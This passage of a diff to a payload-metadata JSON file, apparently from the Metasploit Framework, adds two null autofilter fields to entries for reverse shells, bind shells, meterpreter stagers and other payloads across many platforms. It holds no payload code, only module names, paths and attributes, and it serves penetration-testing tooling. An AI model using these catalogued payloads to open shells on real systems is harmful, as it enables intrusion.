"path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb", @@ -102703,6 +130904,8 @@ "platform": "Linux", "arch": "ppc64le", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb", @@ -102734,6 +130937,8 @@ "platform": "Linux", "arch": "ppc64le", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb", @@ -102765,6 +130970,8 @@ "platform": "Linux", "arch": "ppc64le", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb", @@ -102796,6 +131003,8 @@ "platform": "Linux", "arch": "ppce500v2", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb", @@ -102827,6 +131036,8 @@ "platform": "Linux", "arch": "ppce500v2", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb", @@ -102858,6 +131069,8 @@ "platform": "Linux", "arch": "ppce500v2", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb", @@ -102887,6 +131100,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x64/exec.rb", @@ -102917,6 +131132,8 @@ "platform": "Linux,Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", @@ -102948,6 +131165,8 @@ "platform": "Linux,Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-05 16:30:19 +0000", "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", @@ -102979,6 +131198,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb", @@ -103010,6 +131231,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb", @@ -103041,6 +131264,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb", @@ -103070,6 +131295,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", @@ -103100,6 +131327,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-05 16:30:19 +0000", "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", @@ -103129,6 +131358,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb", @@ -103158,6 +131389,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb", @@ -103187,6 +131420,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x64/shell_find_port.rb", @@ -103216,6 +131451,8 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb", @@ -103247,6 +131484,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/adduser.rb", @@ -103276,6 +131515,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/chmod.rb", @@ -103305,6 +131546,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/exec.rb", @@ -103336,6 +131579,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", @@ -103368,6 +131613,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", @@ -103398,6 +131645,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", @@ -103429,6 +131678,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", @@ -103461,6 +131712,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", @@ -103491,6 +131744,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", @@ -103521,6 +131776,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", @@ -103551,6 +131808,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", @@ -103583,6 +131842,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-15 08:02:51 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", @@ -103615,6 +131876,8 @@ "platform": "Linux,Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-15 08:02:51 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", @@ -103646,6 +131909,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb", @@ -103677,6 +131942,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb", @@ -103708,6 +131975,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb", @@ -103737,6 +132006,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb", @@ -103766,6 +132037,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb", @@ -103795,6 +132068,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/read_file.rb", @@ -103826,6 +132101,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", @@ -103858,6 +132135,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", @@ -103887,6 +132166,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", @@ -103917,6 +132198,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", @@ -103948,6 +132231,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", @@ -103977,6 +132262,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", @@ -104007,6 +132294,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", @@ -104036,6 +132325,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", @@ -104067,6 +132358,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-15 08:02:51 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", @@ -104098,6 +132391,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-15 08:02:51 +0000", "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", @@ -104127,6 +132422,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb", @@ -104156,6 +132453,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb", @@ -104185,6 +132484,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb", @@ -104214,6 +132515,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x86/shell_find_port.rb", @@ -104243,6 +132546,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb", @@ -104273,6 +132578,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb", @@ -104302,6 +132609,8 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-23 13:38:25 +0000", "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb", @@ -104333,6 +132642,8 @@ "platform": "Linux", "arch": "zarch", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb", @@ -104364,6 +132675,8 @@ "platform": "Linux", "arch": "zarch", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb", @@ -104395,6 +132708,8 @@ "platform": "Linux", "arch": "zarch", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb", @@ -104424,6 +132739,8 @@ "platform": "Mainframe", "arch": "zarch", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/payloads/singles/mainframe/shell_reverse_tcp.rb", @@ -104453,6 +132770,8 @@ "platform": "Multi", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/multi/reverse_http.rb", @@ -104482,6 +132801,8 @@ "platform": "Multi", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/multi/reverse_https.rb", @@ -104511,6 +132832,8 @@ "platform": "Netware", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/netware/reverse_tcp.rb", @@ -104540,6 +132863,8 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-10-11 11:09:28 +0000", "path": "/modules/payloads/singles/nodejs/shell_bind_tcp.rb", @@ -104570,6 +132895,8 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp.rb", @@ -104600,6 +132927,8 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb", @@ -104629,6 +132958,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", @@ -104658,6 +132989,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", @@ -104687,6 +133020,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/armle/bind_tcp.rb", @@ -104716,6 +133051,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/armle/reverse_tcp.rb", @@ -104745,6 +133082,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/armle/shell_bind_tcp.rb", @@ -104774,6 +133113,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb", @@ -104803,6 +133144,8 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/armle/vibrate.rb", @@ -104832,6 +133175,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/ppc/bind_tcp.rb", @@ -104861,6 +133206,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/ppc/find_tag.rb", @@ -104890,6 +133237,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/ppc/reverse_tcp.rb", @@ -104919,6 +133268,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb", @@ -104948,6 +133299,8 @@ "platform": "OSX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb", @@ -104978,6 +133331,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", @@ -105008,6 +133363,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-01-10 15:06:08 +0000", "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", @@ -105038,6 +133395,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/exec.rb", @@ -105071,6 +133430,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x64/bind_tcp.rb", @@ -105104,6 +133465,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-01-10 15:06:08 +0000", "path": "/modules/payloads/stagers/osx/x64/reverse_tcp.rb", @@ -105135,6 +133498,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb", @@ -105166,6 +133531,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb", @@ -105197,6 +133564,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb", @@ -105226,6 +133595,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/say.rb", @@ -105255,6 +133626,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/shell_bind_tcp.rb", @@ -105284,6 +133657,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/shell_find_tag.rb", @@ -105313,6 +133688,8 @@ "platform": "OSX", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb", @@ -105342,6 +133719,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", @@ -105371,6 +133750,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", @@ -105402,6 +133783,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x86/exec.rb", @@ -105431,6 +133814,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", @@ -105460,6 +133845,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", @@ -105489,6 +133876,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/osx/x86/shell_bind_tcp.rb", @@ -105518,6 +133907,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/osx/x86/shell_find_port.rb", @@ -105547,6 +133938,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb", @@ -105576,6 +133969,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/bind_tcp.rb", @@ -105605,6 +134000,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", @@ -105634,6 +134031,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb", @@ -105663,6 +134062,8 @@ "platform": "OSX", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb", @@ -105693,6 +134094,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/bind_perl.rb", @@ -105723,6 +134126,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/bind_perl_ipv6.rb", @@ -105753,6 +134158,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/bind_php.rb", @@ -105783,6 +134190,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/bind_php_ipv6.rb", @@ -105812,6 +134221,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/download_exec.rb", @@ -105841,6 +134252,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/exec.rb", @@ -105870,6 +134283,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/bind_tcp.rb", @@ -105899,6 +134314,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/bind_tcp_ipv6.rb", @@ -105929,6 +134346,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb", @@ -105959,6 +134378,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/bind_tcp_uuid.rb", @@ -105988,6 +134409,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/reverse_tcp.rb", @@ -106018,6 +134441,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-12 19:23:31 +0000", "path": "/modules/payloads/stagers/php/reverse_tcp_uuid.rb", @@ -106047,6 +134472,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-07 18:48:10 +0000", "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb", @@ -106076,6 +134503,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/php/reverse_perl.rb", @@ -106105,6 +134534,8 @@ "platform": "PHP", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 